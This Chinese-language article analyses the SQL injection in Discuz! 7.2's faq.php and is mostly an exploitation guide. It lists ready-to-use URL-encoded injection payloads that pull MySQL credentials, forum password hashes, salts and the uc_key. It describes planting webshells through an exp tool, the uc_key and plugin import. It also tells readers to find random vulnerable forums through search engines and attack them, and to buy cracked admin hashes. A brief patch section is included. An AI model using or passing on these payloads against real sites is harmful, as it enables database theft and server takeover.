Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
[antian365.com] simeon
最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用,uc_key获取webshell,插件导入获取Webshell等进行探讨。
1. faq.php文件SQL注入漏洞代码分析
本次存在漏洞的文件为faq.php,打开该文件后,从第148行开始,代码如下
} elseif($action == 'grouppermission') {
require_once'./include/forum.func.php';
require_oncelanguage('misc');
$permlang =$language;
unset($language);
$searchgroupid =isset($searchgroupid) ? intval($searchgroupid) : $groupid;
$groups =$grouplist = array();
$query =$db->query("SELECT groupid, type, grouptitle, radminid FROM{$tablepre}usergroups ORDER BY (creditshigher<>'0' ||creditslower<>'0'), creditslower");
$cgdata =$nextgid = '';
while($group =$db->fetch_array($query)) {
$group['type']= $group['type'] == 'special' && $group['radminid'] ? 'specialadmin' :$group['type'];
$groups[$group['type']][]= array($group['groupid'], $group['grouptitle']);
$grouplist[$group['type']].= '';
if($group['groupid']== $searchgroupid) {
$cgdata= array($group['type'], count($groups[$group['type']]) - 1, $group['groupid']);
}
}
if($cgdata[0] =='member') {
$nextgid =$groups[$cgdata[0]][$cgdata[1] + 1][0];
if($cgdata[1]> 0) {
$gids[1]= $groups[$cgdata[0]][$cgdata[1] - 1];
}
$gids[2] =$groups[$cgdata[0]][$cgdata[1]];
if($cgdata[1]< count($groups[$cgdata[0]]) - 1) {
$gids[3]= $groups[$cgdata[0]][$cgdata[1] + 1];
if(count($gids)== 2) {
$gids[4]= $groups[$cgdata[0]][$cgdata[1] + 2];
}
}elseif(count($gids) == 2) {
$gids[0]= $groups[$cgdata[0]][$cgdata[1] - 2];
}
} else {
$gids[1] =$groups[$cgdata[0]][$cgdata[1]];
}
ksort($gids);
$groupids =array();
foreach($gids as$row) {
$groupids[]= $row[0];
}
$query =$db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN{$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN(".implodeids($groupids).")");
$groups =array();
首先定义一个数组groupids,然后遍历$gids(这也是个数组,就是$_GET[gids]),将数组中的所有值的第一位取出来放在groupids中。为什么这个操作就造成了注入?在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里,有提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体现。discuz在全局会对GET数组进行addslashes转义,也就是说会将'转义成\',所以,如果我们的传入的参数是:gids[1]='的话,会被转义成$gids[1]=\',而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符,也就是\,把转义符号取出来了。在将数据放入sql语句前,通过implodeids函数进行处理了一遍,implodeids函数如下:
function implodeids($array) {
if(!empty($array)){
return"'".implode("','", is_array($array) ? $array :array($array))."'";
} else {
return '';
}
}
很简单一个函数,就是将刚才的$groupids数组用','分割开,组成一个类似于'1','2','3','4'的字符串返回。但是我们的数组刚取出来一个转义符,它会将这里一个正常的'转义掉,比如这样:'1','\','3','4'
有没有看出有点不同,第4个单引号被转义了,也就是说第5个单引号和第3个单引号闭合。这样3这个位置就等于逃逸出了单引号,也就是产生的注入。我们把报错语句放在3这个位置,就能报错。
利用上面提到的思路,通过提交faq.php?xigr[]='&xigr[][uid]=evilcode这样的构造形式可以很容易的突破GPC或类似的安全处理,形成SQL注射漏洞。因此可以构造利用代码:
faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and (select 1 from (select count(*),concat((select (select (selectconcat(username,0x27,password) from cdb_members limit 1) ) from`information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a)%23
2.可利用exp代码
(1)获取mysql用户信息
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28user%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
(2)获取数据库版本信息
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
(3)获取数据库信息
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28database%28%29,floor%28rand%280%29*2%29,0x3a,concat%28user%28%29%29%20%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
(4)获取数据库用户名和密码
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,password,0x3a)%20from%20mysql.user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
(5)获取用户名、email、密码和salt信息
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,email,0x3a,password,0x3a,salt,0x3a,secques%29%20from%20cdb_uc_memberslimit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
(6)获取uc_key
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23
(7)对指定uid获取密码
http://127.0.0.1/dz72/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,email,0x3a,password,0x3a,salt%29%20from%20cdb_uc_memberswhere uid=1 %20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
3.利用exp工具使用
网上公布了可利用的exp工具,通过该工具可以快速获取管理员密码,但有时候admin帐号并不是管理员帐号。利用格式如下:
(1)直接获取webshell,一句话密码为“i0day”
php dz7.2.php www.antian365.com / 1
(2)获取管理密码
php dz7.2.php www.antian365.com / 2
4.Discuz!7.2faq.php文件SQL注入漏洞利用思路
(1)通过exp直接获取webshell,如果不能则获取管理员密码。
(2)对管理员密码进行破解。通过在cmd5.com网站对管理密码进行查询,需要带salt,获取的salt要去掉最后一个数字“1”,例如下面获取
php dz7.2.php www.antian365.com / 2
admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71,需要查询的是c6c45f444cf6a41b309c9401ab9a55a7:066ff7
注意:有时候通过工具获取的密码不一定是管理员,这个时候就需要手工获取管理员的密码,还有如果有secques,就需要暴力破解。
(3)通过uc_key获取shell
(4)进入后台,添加插件获取webshell
(5)http://www.antian365.com/config.inc.php 一句话密码i0day 或者cmd
5.修复方法
(1)直接删除faq.php文件。该文件为显示论坛帮助用的,功能相对独立,可以在服务器禁止该文件的访问,或者直接删除,对论坛常规功能没有任何影响。
(2) 手工修复faq.php
用编辑器打开该文件,查找代码:“} elseif($action =='grouppermission') {”,在其下面添加“ $gids= array();”即可。
6.实际利用案例
6.1直接获取webshell和管理员密码
通过google、百度等搜索引擎搜索“Powered by Discuz!7.2”,在出来的结果中随机选取一个论坛,然后在命令提示符下输入“php dz7.2.php www1.xxxx.com / 1”以及“php dz7.2.php www1.xxxx.com / 2”,如图1所示,直接获取该网站的webshell以及管理员密码。
图1 获取webshell以及管理员密码
注意:
(1)需要本地搭建php运行环境,本案例使用的是ComsenzEXP X2.5,下载地址:http://www.comsenz.com/downloads/install/exp/,安装完毕后需要修改php.ini文件,该文件在安装该软件的php目录中,例如“D:\ComsenzEXP\PHP5”,打开php.ini文件,将以下文件的内容修改为实际安装文件的路径,否则执行php命令会报错。
zend_extension_manager.optimizer_ts="D:\ComsenzEXP\PHP5\Zend"
zend_extension_ts="D:\ComsenzEXP\PHP5\Zend\ZendExtensionManager.dll"
(2)“/”后需要留一个空格。如果存在漏洞则有结果,无结果则表明无法获取webshell或者管理员密码。
在中国菜刀中对上面获取的webshell进行连接测试,如图2所示,成功获取webshell。
图2 对webshell进行连接测试
6.2通过uc_key获取webshell测试
(1)获取uc_key值
在本地打开config.inc.php文件,如图3所示,将UC_KEY值复制,UC_KEY可能是64位,也可能为124位。也可以通过查看数据库中的cdb_uc_applications表的authkey字段值。
图3获取uc_key值
(2)修改uc_key_dz72_me.php程序配置
在uc_key漏洞利用程序uc_key_dz72_me.php中需要手动配置host和uc_key的值,如图4所示。
图4修改漏洞利用程序配置
(3)修改discuz!7.2实际安装路径
在uc_key漏洞利用程序uc_key_dz72_me.php中默认是安装在根目录中,但在实际使用中有可能是安装在其它目录,比如bbs、forum等。如果不是默认根目录,则需要在send()函数中修改uc.php真实路径,例如修改为“/dz72/api/uc.php”,如果是默认的则为“api/uc.php”,其它保持不变。
图5修改post参数
(4)执行利用程序
在php.exe程序所在目录执行“php uc_key_dz72_me.php”,如图6所示,会出现“1”的提示,则表明成功获取webshell。
图6执行漏洞利用程序
(5)查看config.inc.php文件
再次打开config.inc.php文件,如图7所示,uc_key中新增加了一句话后门代码,使用中国菜刀连接,密码为“cmd”。
图7成功获取webshell
6.3手动获取uc_key和webshell
(1)获取uc_key前62位值。
在浏览器中目标地址加上:“/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23”
执行后获取uc_key前62位值,如图8所示。
图8获取uc_key前62位值
(2)获取剩余uc_key值
在上述代码中将(authkey,1,62)修改为(authkey,61,64),如图9所示,获取uc_key值“j2J6”,去掉“j2”,前后值相加即为uc_key的真实值。如果authkey的值超过64位则修改为(authkey,61,128)。substr()函数一次只能获取62位值。直接使用substr(authkey,1,124)也只能获取62位值,如图10所示。
图9获取uc_key剩余值
图10一次只能获取62位值
(3)获取webshell
将uc_key值和host以及真实的路径值进行修改,然后通过uc_key漏洞利用程序,成功获取webshell,如图11所示。
图11获取webshell
(4)修补程序漏洞
在faq.php文件中找到action==grouppermission代码所在处,在其后加入代码“$gids = array();” 如图12所示,保存后即可修复faq.php注入漏洞。
图12修复faq.php文件注入漏洞
6.4管理员不是默认的获取webshell
(1)获取admin密码,但不是管理员帐号
对目标网站通过漏洞利用程序,获取管理员帐号为admin的密码和salt值,如图13所示,将其在cmd5.com进行查询,购买该破解后的密码后,使用其进行网站登录,如图14所示,虽然为admin帐号,但不是管理员。
图13获取admin帐号密码
图14登录网站
(2)获取管理团队帐号名称和uid
在论坛中单击“论坛统计”-“管理团队”,如图15所示,获取所有管理团队的用户帐号名称,单击该帐号可以获取uid值。分别记下其uid值,后续在程序中还有用。
图15获取管理员帐号和uid值
(3)获取真实管理员的帐号、密码和salt值
在浏览器中输入以下代码,获取指定uid的密码、email、salt值:
http://www.antian365.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,email,0x3a,password,0x3a,salt%29%20from%20cdb_uc_memberswhere uid=50477%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
执行后通过出错信息获取其相应的值,如图16所示。
图16获取指定管理员的帐号密码和salt值
后续步骤跟上面的类似,通过破解管理员的密码,登录后台,通过添加插件,成功获取webshell。